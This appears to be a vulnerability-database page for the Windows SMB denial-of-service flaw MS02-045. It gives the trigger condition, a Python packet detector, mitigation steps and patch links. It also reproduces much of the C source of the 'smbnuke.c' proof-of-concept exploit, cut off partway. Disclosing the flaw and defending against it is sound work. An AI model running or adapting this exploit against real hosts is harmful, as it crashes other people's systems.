CVE-2002-0724
CVSS 7.5
Published: 2002-09-24 00:00:00
Revised: 2016-10-17 22:21:51

[Original] Buffer overflow in SMB (Server Message Block) protocol in Microsoft Windows NT, Windows 2000, and Windows XP allows attackers to cause a denial of service (crash) via a SMB_COM_TRANSACTION packet with a request for the (1) NetShareEnum, (2) NetServerEnum2, or (3) NetServerEnum3, aka "Unchecked Buffer in Network Share Provider Can Lead to Denial of Service".


[CNNVD] Microsoft Network Share Provider SMB Request Remote Buffer Overflow Vulnerability (MS02-045) (CNNVD-200209-037)

Microsoft Windows operating systems use the Server Message Block (SMB) protocol to provide an open, cross-platform mechanism for file and printer sharing over the network; the protocol is also known as CIFS (Common Internet File System). The Windows implementation of CIFS currently listens on TCP/139 and TCP/445, depending on whether NetBIOS over TCP/IP is enabled.
Windows mishandles malformed SMB requests. A remote attacker can exploit this flaw to cause a denial of service and may be able to execute arbitrary code with system privileges.
The SMB_COM_TRANSACTION command lets a client and server define special functions for a particular resource on a particular server; support for these functions is not defined by the protocol itself but implemented by the client and the server.
By sending specially crafted packets requesting the NetServerEnum2, NetServerEnum3 or NetShareEnum transaction, an attacker can cause a denial of service on the target system and may be able to execute arbitrary code with system privileges, although the latter has not been confirmed. The attacker only needs to set the 'Max Param Count' or 'Max Data Count' field in the parameter area of the transaction to zero.
Triggering the vulnerability through the NetShareEnum transaction requires a valid account, whereas NetServerEnum2 and NetServerEnum3 can be triggered anonymously, without a password.
Windows allows anonymous access by default, so any user can perform a denial of service against a Windows system in its default configuration.
After a successful attack the system crashes (blue screen) with a message similar to the following:
*** STOP: 0x0000001E (0xC0000005, 0x804B818B, 0x00000001, 0x00760065)
 KMODE_EXCEPTION_NOT_HANDLED
 *** Address 804B818B base at 80400000, DateStamp 384d9b17 0 ntoskrnl.exe
Physical memory is dumped and the system reboots.
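As an added illustration (not part of the CNNVD entry or of the PoC reproduced later on this page), the following Python detector parses an NBSS-framed SMB_COM_TRANSACTION request and flags the condition described above: a \PIPE\LANMAN RAP call for NetShareEnum, NetServerEnum2 or NetServerEnum3 whose MaxParameterCount or MaxDataCount is zero. The RAP function numbers for NetShareEnum (0) and NetServerEnum3 (215) are taken from the MS-RAP specification, and the sample frames are constructed inline for testing, not captured traffic.

```python
import struct

NBSS_SESSION_MESSAGE = 0x00
SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25
SMB_HEADER_LEN = 32
LANMAN_PIPE = b"\\PIPE\\LANMAN"

# RAP function numbers from MS-RAP; 0x68 (NetServerEnum2) is also the value
# hard-coded in the smbnuke.c PoC reproduced later on this page.
RAP_FUNCTIONS = {0: "NetShareEnum", 104: "NetServerEnum2", 215: "NetServerEnum3"}

# Word block of an SMB_COM_TRANSACTION request, little-endian, in the same
# order as the PoC's transaction_request struct (without wct and bcc):
# TotalParam, TotalData, MaxParam, MaxData, MaxSetup, Res1, Flags, Timeout,
# Res2, ParamCount, ParamOffset, DataCount, DataOffset, SetupCount, Res3
TRANS_WORDS = struct.Struct("<HHHHBBHIHHHHHBB")


def parse_transaction(frame):
    """Parse one NBSS session message carrying an SMB_COM_TRANSACTION request.

    Returns the fields the MS02-045 check needs, or None when the frame is
    something else or is truncated."""
    if len(frame) < 4 + SMB_HEADER_LEN + 1:
        return None
    if frame[0] != NBSS_SESSION_MESSAGE or int.from_bytes(frame[1:4], "big") != len(frame) - 4:
        return None
    smb = frame[4:]
    if smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_TRANSACTION:
        return None
    wct = smb[SMB_HEADER_LEN]
    if wct < 14 or len(smb) < SMB_HEADER_LEN + 1 + 2 * wct + 2:
        return None
    words = TRANS_WORDS.unpack_from(smb, SMB_HEADER_LEN + 1)
    setup_cnt = words[13]
    if wct != 14 + setup_cnt:
        return None
    bcc_off = SMB_HEADER_LEN + 1 + TRANS_WORDS.size + 2 * setup_cnt
    bcc = struct.unpack_from("<H", smb, bcc_off)[0]
    byte_block = smb[bcc_off + 2:bcc_off + 2 + bcc]
    name = byte_block.split(b"\x00", 1)[0]
    # ParameterOffset is counted from the start of the SMB header.
    param_cnt, param_off = words[9], words[10]
    params = smb[param_off:param_off + param_cnt]
    rap_function = struct.unpack_from("<H", params)[0] if len(params) >= 2 else None
    return {
        "name": name,
        "max_param": words[2],
        "max_data": words[3],
        "rap_function": rap_function,
    }


def check_ms02_045(frame):
    """Return a short finding when the frame matches the MS02-045 pattern (a
    \\PIPE\\LANMAN RAP enumeration whose MaxParameterCount or MaxDataCount is
    zero), otherwise None."""
    t = parse_transaction(frame)
    if t is None or t["name"] != LANMAN_PIPE or t["rap_function"] not in RAP_FUNCTIONS:
        return None
    if t["max_param"] == 0 or t["max_data"] == 0:
        return (f"{RAP_FUNCTIONS[t['rap_function']]} request with "
                f"MaxParameterCount={t['max_param']} MaxDataCount={t['max_data']}")
    return None


def build_sample(max_param, max_data, rap_function):
    """Construct a test frame (not captured traffic) with the given
    MaxParameterCount, MaxDataCount and RAP function; IDs are left zero."""
    header = SMB_MAGIC + bytes([SMB_COM_TRANSACTION]) + b"\x00" * (SMB_HEADER_LEN - 5)
    name = LANMAN_PIPE + b"\x00"
    # RAP parameters: function, param descriptor, data descriptor, level, buffer size
    params = (struct.pack("<H", rap_function) + b"WrLeh\x00" + b"B13BWz\x00"
              + struct.pack("<HH", 1, 0xFFFF))
    param_off = SMB_HEADER_LEN + 1 + TRANS_WORDS.size + 2 + len(name)
    words = TRANS_WORDS.pack(len(params), 0, max_param, max_data, 0, 0, 0, 0, 0,
                             len(params), param_off, 0, param_off + len(params), 0, 0)
    byte_block = name + params
    smb = header + bytes([14]) + words + struct.pack("<H", len(byte_block)) + byte_block
    return bytes([NBSS_SESSION_MESSAGE]) + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    for mp, md, fn in ((0, 0, 104), (8, 0xFFFF, 104), (8, 0, 0)):
        print(mp, md, fn, "->", check_ms02_045(build_sample(mp, md, fn)))
```

A well-formed client request carries non-zero maximum counts, so only the zero case is reported; other RAP functions and non-transaction frames are ignored.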

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstation  Microsoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_nt:4.0:sp6:workstation  Microsoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstation  Microsoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_nt:4.0:sp4:workstation  Microsoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstation  Microsoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstation  Microsoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_nt:4.0:sp6a:server  Microsoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_xp::gold  Microsoft windows xp_gold
cpe:/o:microsoft:windows_nt:4.0:sp6a:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6a
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstation  Microsoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_2000::sp3:professional  Microsoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_nt:4.0:sp5:server  Microsoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:server  Microsoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:server  Microsoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000::sp3:advanced_server  Microsoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp4:server  Microsoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp1:server  Microsoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:server  Microsoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2

- OVAL (technical details for detection)

oval:org.mitre.oval:def:189  Network Share Provider Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0724
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0724
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-037
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=103011556323184&w=2
(UNKNOWN)  BUGTRAQ  20020822 CORE-20020618: Vulnerabilities in Windows SMB (DoS)
http://www.kb.cert.org/vuls/id/250635
(VENDOR_ADVISORY)  CERT-VN  VU#250635
http://www.kb.cert.org/vuls/id/311619
(UNKNOWN)  CERT-VN  VU#311619
http://www.kb.cert.org/vuls/id/342243
(UNKNOWN)  CERT-VN  VU#342243
http://www.microsoft.com/technet/security/bulletin/ms02-045.asp
(VENDOR_ADVISORY)  MS  MS02-045

- Vulnerability information

Microsoft Network Share Provider SMB Request Remote Buffer Overflow Vulnerability (MS02-045)
High risk  Boundary condition error
2002-09-24 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Restrict anonymous access to the LSA component on Windows 2000. This blocks attacks by anonymous users but not by users with a valid account.
         Steps:
         Run the Registry Editor (regedt32.exe) from "Start > Run..." or a command prompt and locate the following key:
         HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
         Add or modify the value "RestrictAnonymous":
         Value name: RestrictAnonymous
         Type: REG_DWORD
         Data: 0x2 (hexadecimal)
         Reboot the system for the registry change to take effect.
         Alternatively, use the following method:
         Open Control Panel -- Administrative Tools -- Local Security Policy ("Domain Security Policy" on a domain controller),
         under Local Policies -- Security Options set "Additional restrictions for anonymous connections"
         to "No access without explicit anonymous permissions", then reboot the system.
         On Windows NT and XP anonymous access cannot be blocked through this registry change; the only temporary measure is to shut down the sharing service.
        
         Note: blocking anonymous connections (null sessions) may break normal functionality in some situations (for example on domain controllers or SQL servers), so NSFOCUS recommends installing the patch as soon as possible.
        
        * If you do not need to provide network shares, disable sharing entirely.
         On Windows 2000 and XP, sharing is disabled as follows:
         Control Panel - Network and Dial-up Connections - Advanced (menu bar) - Advanced Settings,
         select the bindings for Local Area Connection and uncheck "File and Printer Sharing for Microsoft Networks".
         On Windows NT, sharing is disabled as follows:
         Network Neighborhood - Properties (right-click) - Bindings - show all protocols - disable WINS Client.
        * On gateway devices or the perimeter firewall, filter access to the following ports on internal hosts:
         139/TCP
         445/TCP
         445/UDP
         Note that this does not protect against malicious internal users. To protect against them, install host firewall software or enable the TCP/IP filtering built into Windows to block the ports above.
        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS02-045) and the corresponding patch:
        MS02-045: Unchecked Buffer in Network Share Provider Can Lead to Denial of Service (Q326830)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS02-045.asp

        Patch download:
         * Microsoft Windows NT 4.0:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41493

         * Microsoft Windows NT 4.0 Terminal Server Edition:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41519

         * Microsoft Windows 2000:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41468

         * Microsoft Windows XP:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41524

         * Microsoft Windows XP 64 bit Edition:
        
        http://www.microsoft.com/downloads/Release.asp?ReleaseID=41549

- Vulnerability information (21746)

MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1) (EDBID:21746)
windows dos
2002-08-22 Verified
0 Frederic Deletang
N/A [Download]
source: http://www.securityfocus.com/bid/5556/info

Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reported in the handling of some malformed SMB requests.

An attacker may send a malformed SMB request packet in order to exploit this condition. It has been reported possible to corrupt heap memory, leading to a crash of the underlying system.

It may prove possible to exploit this vulnerability to execute arbitrary code and gain local access to the vulnerable system. This possibility has not, however, been confirmed.

Reportedly, this vulnerability may be exploited both as an authenticated user, and with anonymous access to the service.

It has been reported, by "Fabio Pietrosanti (naif)" <naif@blackhats.it>, that disabling the NetBIOS Null Session will prevent exploitation of this vulnerability.

/*
 *   smbnuke.c -- Windows SMB Nuker (DoS) - Proof of concept
 *   Copyright (C) 2002  Frederic Deletang (df@phear.org)
 *
 *   This program is free software; you can redistribute it and/or
 *   modify it under the terms of the GNU General Public License
 *   as published by the Free Software Foundation; either version 2 of
 *   the License or (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be
 *   useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 *   of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public License
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 *   USA
 */

/* NOTE:
 * Compile this program using only GCC and no other compilers
 * (except if you think this one supports the __attribute__ (( packed )) attribute)
 * This program might not work on big-endian systems.
 * It has been successfully tested from the following platforms:
 * 	- Linux 2.4.18 / i686
 * 	- FreeBSD 4.6.1-RELEASE-p10 / i386
 * Don't bother me if you can't get it to compile or work on Solaris using the SunWS compiler.
 *
 * Another thing: The word counts are hardcoded, careful if you hack the sources.
 */

/* Copyright notice:
 * some parts of this source (only two functions, name_len and name_mangle)
 * has been taken from libsmb.  The rest, especially the structures has
 * been written by me.
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <fcntl.h>
#include <stdlib.h>
#include <ctype.h>
#include <assert.h>
#include <string.h>
#include <errno.h>
#include <time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <sys/time.h>

#define SESSION_REQUEST 0x81

#define SESSION_MESSAGE 0x00

#define SMB_NEGOTIATE_PROTOCOL 0x72
#define SMB_SESSION_SETUP_ANDX 0x73
#define SMB_TREE_CONNECT_ANDX 0x75
#define SMB_COM_TRANSACTION 0x25

#define bswap16(x) \
	((((x) >> 8) & 0xff) | (((x) & 0xff) << 8))

typedef struct
{
  unsigned char server_component[4];
  unsigned char command;
  unsigned char error_class;
  unsigned char reserved1;
  uint16_t error_code;
  uint8_t flags;
  uint16_t flags2;
  unsigned char reserved2[12];
  uint16_t tree_id;
  uint16_t proc_id;
  uint16_t user_id;
  uint16_t mpex_id;
}
__attribute__ ((packed)) smb_header;

typedef struct
{
  unsigned char type;
  unsigned char flags;
  unsigned short length;
  unsigned char called[34];
  unsigned char calling[34];
}
__attribute__ ((packed)) nbt_packet;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  unsigned char andx_command;
  unsigned char reserved1;
  uint16_t andx_offset;
  uint16_t max_buffer;
  uint16_t max_mpx_count;
  uint16_t vc_number;
  uint32_t session_key;
  uint16_t ANSI_pwlen;
  uint16_t UNI_pwlen;
  unsigned char reserved2[4];
  uint32_t capabilities;
  /* bcc: byte count */
  uint16_t bcc;
}
__attribute__ ((packed)) session_setup_andx_request;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  unsigned char andx_command;
  unsigned char reserved1;
  uint16_t andx_offset;
  uint16_t flags;
  uint16_t pwlen;
  uint16_t bcc;
}
__attribute__ ((packed)) tree_connect_andx_request;

typedef struct
{
  /* wct: word count */
  uint8_t wct;
  uint16_t total_param_cnt;
  uint16_t total_data_cnt;
  uint16_t max_param_cnt;
  uint16_t max_data_cnt;
  uint8_t max_setup_cnt;
  unsigned char reserved1;
  uint16_t flags;
  uint32_t timeout;
  uint16_t reserved2;
  uint16_t param_cnt;
  uint16_t param_offset;
  uint16_t data_cnt;
  uint16_t data_offset;
  uint8_t setup_count;
  uint8_t reserved3;
  /* bcc: byte count */
  uint16_t bcc;
}
__attribute__ ((packed)) transaction_request;

typedef struct
{
  uint16_t function_code;
  unsigned char param_descriptor[6];
  unsigned char return_descriptor[7];
  uint16_t detail_level;
  uint16_t recv_buffer_len;
}
__attribute__ ((packed)) parameters;


typedef struct
{
  uint8_t format;
  unsigned char *name;
}
t_dialects;

t_dialects dialects[] = {
  {2, "PC NETWORK PROGRAM 1.0"},
  {2, "MICROSOFT NETWORKS 1.03"},
  {2, "MICROSOFT NETWORKS 3.0"},
  {2, "LANMAN1.0"},
  {2, "LM1.2X002"},
  {2, "Samba"},
  {2, "NT LM 0.12"},
  {2, "NT LANMAN 1.0"},
  {0, NULL}
};

enum
{
  STATE_REQUESTING_SESSION_SETUP = 1,
  STATE_NEGOTIATING_PROTOCOL,
  STATE_REQUESTING_SESSION_SETUP_ANDX,
  STATE_REQUESTING_TREE_CONNECT_ANDX,
  STATE_REQUESTING_TRANSACTION
}
status;

const unsigned char *global_scope = NULL;

/****************************************************************************
 * return the total storage length of a mangled name - from smbclient
 *
 ****************************************************************************/

int
name_len (char *s1)
{
  /* NOTE: this argument _must_ be unsigned */
  unsigned char *s = (unsigned char *) s1;
  int len;

  /* If the two high bits of the byte are set, return 2. */
  if (0xC0 == (*s & 0xC0))
    return (2);

  /* Add up the length bytes. */
  for (len = 1; (*s); s += (*s) + 1)
    {
      len += *s + 1;
      assert (len < 80);
    }

  return (len);
}                               /* name_len */


/****************************************************************************
 * mangle a name into netbios format - from smbclient 
 *  Note:  <Out> must be (33 + strlen(scope) + 2) bytes long, at minimum.
 *
 ****************************************************************************/

int
name_mangle (char *In, char *Out, char name_type)
{
  int i;
  int c;
  int len;
  char buf[20];
  char *p = Out;

  /* Safely copy the input string, In, into buf[]. */
  (void) memset (buf, 0, 20);
  if (strcmp (In, "*") == 0)
    buf[0] = '*';
  else
    (void) snprintf (buf, sizeof (buf) - 1, "%-15.15s%c", In, name_type);

  /* Place the length of the first field into the output buffer. */
  p[0] = 32;
  p++;

  /* Now convert the name to the rfc1001/1002 format. */
  for (i = 0; i < 16; i++)
    {
      c = toupper (buf[i]);
      p[i * 2] = ((c >> 4) & 0x000F) + 'A';
      p[(i * 2) + 1] = (c & 0x000F) + 'A';
    }
  p += 32;
  p[0] = '\0';

  /* Add the scope string. */
  for (i = 0, len = 0; NULL != global_scope; i++, len++)
    {
      switch (global_scope[i])
        {
        case '\0':
          p[0] = len;
          if (len > 0)
            p[len + 1] = 0;
          return (name_len (Out));
        case '.':
          p[0] = len;
          p += (len + 1);
          len = -1;
          break;
        default:
          p[len + 1] = global_scope[i];
          break;
        }
    }

  return (name_len (Out));

}

int
tcp_connect (const char *rhost, unsigned short port)
{
  struct sockaddr_in dest;
  struct hostent *host;
  int fd;

  host = gethostbyname (rhost);
  if (host == NULL)
    {
      fprintf (stderr, "Could not resolve host: %s\n", rhost);
      return -1;
    }

  dest.sin_family = AF_INET;
  dest.sin_addr.s_addr = *(long *) (host->h_addr);
  dest.sin_port = htons (port);

  fd = socket (AF_INET, SOCK_STREAM, 0);

  if (connect (fd, (struct sockaddr *) &dest, sizeof (dest)) < 0)
    {
      fprintf (stderr, "Could not connect to %s:%d - %s\n", rhost, port,
               strerror (errno));
      return -1;
    }

  return fd;
}

void
build_smb_header (smb_header * hdr, uint8_t command, uint8_t flags,
                  uint16_t flags2, uint16_t tree_id, uint16_t proc_id,
                  uint16_t user_id, uint16_t mpex_id)
{
  memset (hdr, 0, sizeof (smb_header));

  /* SMB Header MAGIC. */
  hdr->server_component[0] = 0xff;
  hdr->server_component[1] = 'S';
  hdr->server_component[2] = 'M';
  hdr->server_component[3] = 'B';

  hdr->command = command;

  hdr->flags = flags;
  hdr->flags2 = flags2;

  hdr->tree_id = tree_id;
  hdr->proc_id = proc_id;
  hdr->user_id = user_id;
  hdr->mpex_id = mpex_id;
}

unsigned char *
push_string (unsigned char *stack, unsigned char *string)
{
  strcpy (stack, string);
  return stack + strlen (stack) + 1;
}

void
request_session_setup (int fd, char *netbios_name)
{
  nbt_packet pkt;

  pkt.type = SESSION_REQUEST;
  pkt.flags = 0x00;
  pkt.length = bswap16 (sizeof (nbt_packet));
  name_mangle (netbios_name, pkt.called, 0x20);
  name_mangle ("", pkt.calling, 0x00);
  write (fd, &pkt, sizeof (nbt_packet));

}

void
negotiate_protocol (unsigned char *buffer, int fd)
{
  smb_header hdr;
  unsigned char *p;
  uint16_t proc_id, mpex_id;
  int i;

  proc_id = (uint16_t) rand ();
  mpex_id = (uint16_t) rand ();

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  build_smb_header (&hdr, SMB_NEGOTIATE_PROTOCOL, 0, 0, 0, proc_id, 0,
                    mpex_id);

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  p = buffer + 4 + sizeof (smb_header) + 3;

  for (i = 0; dialects[i].name != NULL; i++)
    {
      *p = dialects[i].format;
      strcpy (p + 1, dialects[i].name);
      p += strlen (dialects[i].name) + 2;
    }

  /* Set the word count */
  *(uint8_t *) (buffer + 4 + sizeof (smb_header)) = 0;

  /* Set the byte count */
  *(uint16_t *) (buffer + 4 + sizeof (smb_header) + 1) =
    (uint16_t) (p - buffer - 4 - sizeof (smb_header) - 3);

  *(uint16_t *) (buffer + 2) = bswap16 ((uint16_t) (p - buffer - 4));

  write (fd, buffer, p - buffer);

}

void
request_session_setup_andx (unsigned char *buffer, int fd)
{
  smb_header hdr;
  session_setup_andx_request ssar;
  uint16_t proc_id, mpex_id;
  unsigned char *p;

  proc_id = (uint16_t) rand ();
  mpex_id = (uint16_t) rand ();

  build_smb_header (&hdr, SMB_SESSION_SETUP_ANDX, 0x08, 0x0001, 0, proc_id, 0,
                    mpex_id);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  p = buffer + 4 + sizeof (smb_header);

  memset (&ssar, 0, sizeof (session_setup_andx_request));
  ssar.wct = 13;
  ssar.andx_command = 0xff;     /* No further commands */
  ssar.max_buffer = 65535;
  ssar.max_mpx_count = 2;
  ssar.vc_number = 1025;

  ssar.ANSI_pwlen = 1;

  p = buffer + 4 + sizeof (smb_header) + sizeof (session_setup_andx_request);

  /* Ansi password */
  p = push_string (p, "");

  /* Account */
  p = push_string (p, "");

  /* Primary domain */
  p = push_string (p, "WORKGROUP");

  /* Native OS */
  p = push_string (p, "Unix");

  /* Native Lan Manager */
  p = push_string (p, "Samba");

  ssar.bcc =
    p - buffer - 4 - sizeof (smb_header) -
    sizeof (session_setup_andx_request);

  memcpy (buffer + 4 + sizeof (smb_header), &ssar,
          sizeof (session_setup_andx_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (session_setup_andx_request) + sizeof (smb_header) +
              ssar.bcc));

  write (fd, buffer,
         sizeof (session_setup_andx_request) + sizeof (smb_header) + 4 +
         ssar.bcc);
}

void
request_tree_connect_andx (unsigned char *buffer, int fd,
                           const char *netbios_name)
{
  smb_header hdr;
  tree_connect_andx_request tcar;
  uint16_t proc_id, user_id;
  unsigned char *p, *q;

  proc_id = (uint16_t) rand ();
  user_id = ((smb_header *) (buffer + 4))->user_id;

  build_smb_header (&hdr, SMB_TREE_CONNECT_ANDX, 0x18, 0x2001, 0, proc_id,
                    user_id, 0);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  memset (&tcar, 0, sizeof (tree_connect_andx_request));

  tcar.wct = 4;
  tcar.andx_command = 0xff;     /* No further commands */
  tcar.pwlen = 1;

  p = buffer + 4 + sizeof (smb_header) + sizeof (tree_connect_andx_request);

  /* Password */
  p = push_string (p, "");

  /* Path */
  q = malloc (8 + strlen (netbios_name));

  sprintf (q, "\\\\%s\\IPC$", netbios_name);
  p = push_string (p, q);

  free (q);

  /* Service */
  p = push_string (p, "IPC");

  tcar.bcc =
    p - buffer - 4 - sizeof (smb_header) - sizeof (tree_connect_andx_request);

  memcpy (buffer + 4 + sizeof (smb_header), &tcar,
          sizeof (tree_connect_andx_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (tree_connect_andx_request) + sizeof (smb_header) +
              tcar.bcc));

  write (fd, buffer,
         sizeof (tree_connect_andx_request) + sizeof (smb_header) + 4 +
         tcar.bcc);
}

void
request_transaction (unsigned char *buffer, int fd)
{
  smb_header hdr;
  transaction_request transaction;
  parameters params;
  uint16_t proc_id, tree_id, user_id;
  unsigned char *p;

  proc_id = (uint16_t) rand ();
  tree_id = ((smb_header *) (buffer + 4))->tree_id;
  user_id = ((smb_header *) (buffer + 4))->user_id;

  build_smb_header (&hdr, SMB_COM_TRANSACTION, 0, 0, tree_id, proc_id,
                    user_id, 0);

  buffer[0] = SESSION_MESSAGE;
  buffer[1] = 0x0;

  memcpy (buffer + 4, &hdr, sizeof (smb_header));

  memset (&transaction, 0, sizeof (transaction_request));

  transaction.wct = 14;
  transaction.total_param_cnt = 19; /* Total length of parameters */
  transaction.param_cnt = 19; /* Length of parameters */

  p = buffer + 4 + sizeof (smb_header) + sizeof (transaction_request);

  /* Transaction name */
  p = push_string (p, "\\PIPE\\LANMAN");

  transaction.param_offset = p - buffer - 4;

  params.function_code = (uint16_t) 0x68;       /* NetServerEnum2 */
  strcpy (params.param_descriptor, "WrLeh");    /* RAP_NetGroupEnum_REQ  */
  strcpy (params.return_descriptor, "B13BWz");  /* RAP_SHARE_INFO_L1 */
  params.detail_level = 1;
  params.recv_buffer_len = 50000;

  memcpy (p, &params, sizeof (parameters));

  p += transaction.param_cnt;

  transaction.data_offset = p - buffer - 4;

  transaction.bcc =
    p - buffer - 4 - sizeof (smb_header) - sizeof (transaction_request);

  memcpy (buffer + 4 + sizeof (smb_header), &transaction,
          sizeof (transaction_request));

  /* Another byte count */
  *(uint16_t *) (buffer + 2) =
    bswap16 ((uint16_t)
             (sizeof (transaction_request) + sizeof (smb_header) +
              transaction.bcc));

  write (fd, buffer,
         sizeof (transaction_request) + sizeof (smb_header) + 4 +
         transaction.bcc);
}

typedef struct
{
  uint16_t transaction_id;
  uint16_t flags;
  uint16_t questions;
  uint16_t answerRRs;
  uint16_t authorityRRs;
  uint16_t additionalRRs;

  unsigned char query[32];
  uint16_t name;
  uint16_t type;
  uint16_t class;
}
__attribute__ ((packed)) nbt_name_query;

typedef struct
{
  nbt_name_query answer;
  uint32_t ttl;
  uint16_t datalen;
  uint8_t names;
}
__attribute__ ((packed)) nbt_name_query_answer;

char *
list_netbios_names (unsigned char *buffer, size_t size, const char *rhost,
                    unsigned short port, unsigned int timeout)
{
  nbt_name_query query;
  struct sockaddr_in dest;
  struct hostent *host;
  int fd, i;

  fd_set rfds;
  struct timeval tv;

  printf ("Trying to list netbios names on %s\n", rhost);

  host = gethostbyname (rhost);
  if (host == NULL)
    {
      fprintf (stderr, "Could not resolve host: %s\n", rhost);
      return NULL;
    }

  memset (&dest, 0, sizeof (struct sockaddr_in));

  dest.sin_family = AF_INET;
  dest.sin_addr.s_addr = *(long *) (host->h_addr);
  dest.sin_port = htons (port);

  if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) < 0)
    {
      fprintf (stderr, "Could not setup the UDP socket: %s\n",
               strerror (errno));
      return NULL;
    }

  memset (&query, 0, sizeof (nbt_name_query));

  query.transaction_id = (uint16_t) bswap16 (0x1e);     //rand();
  query.flags = bswap16 (0x0010);
  query.questions = bswap16 (1);

  name_mangle ("*", query.query, 0);
  query.type = bswap16 (0x21);
  query.class = bswap16 (0x01);

  if (sendto
      (fd, &query, sizeof (nbt_name_query), 0, (struct sockaddr *) &dest,
       sizeof (struct sockaddr_in)) != sizeof (nbt_name_query))
    {
      fprintf (stderr, "Could not send UDP packet: %s\n", strerror (errno));
      return NULL;
    }

  /* Now, wait for an answer -- add a timeout to 10 seconds */

  FD_ZERO (&rfds);
  FD_SET (fd, &rfds);

  tv.tv_sec = timeout;
  tv.tv_usec = 0;

